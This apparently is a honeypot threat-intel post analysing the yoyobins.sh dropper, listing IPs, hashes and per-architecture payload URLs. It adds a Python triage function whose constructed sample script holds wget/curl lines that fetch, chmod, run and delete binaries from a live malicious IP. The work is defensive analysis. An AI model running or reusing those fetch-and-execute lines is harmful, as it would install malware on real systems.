Script Analysis - yoyobins.sh

In addition to my weekly threat intel report, I want to highlight a particular file/executable/exploit attempt I saw in the last week. I'll do some basic analysis of the file to better understand what it is and what it's trying to accomplish. Hopefully this can provide contextual data for those doing their own research.

This week we're looking at yoyobins.sh, a malicious file acting as a malware dropper. My logs show an American IP address logging into my honeypot and then reaching out to a Croatian IP to fetch the dropper, yoyobins.sh. When this script is run, it requests a number of additional payloads (one per CPU architecture) and attempts to save them to various directories (/tmp, /var/run, /root). Once a payload is saved, the script changes the file's permissions to make it executable, runs it, then deletes the file after it completes.

Filename: yoyobins.sh
Timestamp: 2020-06-08 12:59PM PST
Initiating Source IP: 104.248.48.57
Downloaded from: http://45.95.168.196/yoyobins.sh
SHA256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
Virus Total Link: https://www.virustotal.com/gui/file/bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1/detection

File Contents:

Initiating Source IP Analysis (via https://www.ipvoid.com/):

Analysis Date: 2020-06-08 21:39:51
Elapsed Time: 2 seconds
Blacklist Status: BLACKLISTED 11/114
IP Address: 104.248.48.57
Reverse DNS: prod-nyc1.qencode-encoder-d9bdf0b8a9ec11ea888b0e903d539a24
ASN: AS14061
ASN Owner: DIGITALOCEAN-ASN
ISP: Digital Ocean
Continent: North America
Country Code: (US) United States
Latitude / Longitude: 40.793 / -74.0247
City: North Bergen
Region: New Jersey


Download URL Analysis (via https://www.ipvoid.com/):

Analysis Date: 2020-06-08 21:40:37
Elapsed Time: 3 seconds
Blacklist Status: BLACKLISTED 6/114
IP Address: 45.95.168.196
Reverse DNS: slot0.ormardex.com
ASN: AS42864
ASN Owner: Giganet Internet Szolgaltato Kft
ISP: MAXKO j.d.o.o.
Continent: Europe
Country Code: (HR) Croatia
Latitude / Longitude: 45.4675 / 16.3868
City: Sisak
Region: Sisacko-Moslavacka Zupanija


Virus Total Stats:
As of 2020-06-08, 32/60 engines detect this file as malicious

Additional properties:
MD5: a39ab86543f724295ce2678e78d754f5
SHA-1: 7078ca1701557231495c035cba938588e5fb1b2b
SHA-256: bde80d3922630e57731bb0dd6c8705aa8ca3fb863b9fcac295076ac9ad1510e1
SSDEEP: 12:q0FoV0FS0Fd0c43fX0Fa8eekX0Flk0FVUX0Fg1FZ0FlEX0FC0FdeV8po0F7O0FQ:vo+nyc4krasvVUsg+lEsX9JnQ
File type: Shell script
Magic: Bourne-Again shell script text executable
File size: 1.48 KB (1516 bytes)

Contacted URLs (one payload per target architecture):

http://45.95.168.196/mips
http://45.95.168.196/mipsel
http://45.95.168.196/sh4
http://45.95.168.196/x86
http://45.95.168.196/armv6l
http://45.95.168.196/i686
http://45.95.168.196/powerpc
http://45.95.168.196/i586
http://45.95.168.196/m68k
http://45.95.168.196/sparc
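
The fetch / stage / chmod / run / delete chain described above, together with the per-architecture URL list, is a pattern that can be triaged statically. The Python below is an added example, not code from the post or from the dropper itself; the sample script it scans is constructed to mimic the described behaviour (it is NOT the real contents of yoyobins.sh) and reuses the contacted URLs listed above.

```python
import re

# Constructed sample modelled on the behaviour described in the post; it is
# NOT the real contents of yoyobins.sh. URLs are the contacted URLs above.
SAMPLE_SCRIPT = """#!/bin/bash
cd /tmp || cd /var/run || cd /root
wget http://45.95.168.196/mips -O .x; chmod +x .x; ./.x; rm -rf .x
wget http://45.95.168.196/x86 -O .x; chmod +x .x; ./.x; rm -rf .x
curl -O http://45.95.168.196/sh4; chmod 777 sh4; ./sh4; rm -rf sh4
"""

# Raw-IP download URLs as (host, path) pairs; legitimate installers rarely
# fetch binaries straight from a bare IP address.
URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})/([^\s;|&]+)")
STAGE_DIRS = ("/tmp", "/var/tmp", "/dev/shm", "/var/run", "/root")
# Architecture names from the contacted-URL list, plus common siblings.
ARCH_WORDS = {"mips", "mipsel", "sh4", "x86", "armv6l", "i686", "powerpc",
              "i586", "m68k", "sparc", "arm", "arm7", "x86_64"}

def triage_dropper(script: str) -> dict:
    """Static triage of a shell script body for multi-arch dropper behaviour."""
    urls = URL_RE.findall(script)
    arches = sorted({path.rsplit("/", 1)[-1] for _, path in urls} & ARCH_WORDS)
    findings = {
        "hosts": sorted({host for host, _ in urls}),
        "arches": arches,
        "stage_dirs": sorted(d for d in STAGE_DIRS if d in script),
        "makes_executable": re.search(r"\bchmod\s+(\+x|[0-7]{3,4})\b", script) is not None,
        "executes_download": re.search(r"(^|[;&|]\s*)\./\S+", script, re.M) is not None,
        "self_cleanup": re.search(r"\brm\s+-r?f\b", script) is not None,
    }
    # Score only the behaviours the post describes: fetch, stage, chmod, run, delete,
    # plus the multi-architecture fan-out seen in the contacted URLs.
    hits = [bool(urls), bool(findings["stage_dirs"]), findings["makes_executable"],
            findings["executes_download"], findings["self_cleanup"], len(arches) >= 2]
    findings["score"] = sum(hits)
    findings["verdict"] = ("likely multi-arch dropper" if findings["score"] >= 5
                           else "suspicious" if findings["score"] >= 3
                           else "no dropper indicators")
    return findings

if __name__ == "__main__":
    for key, value in triage_dropper(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

The hosts and architecture names it extracts can be fed straight into blocklists or hunting queries against honeypot and proxy logs.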

Windows Defender:

Virus Total Graph Summary:
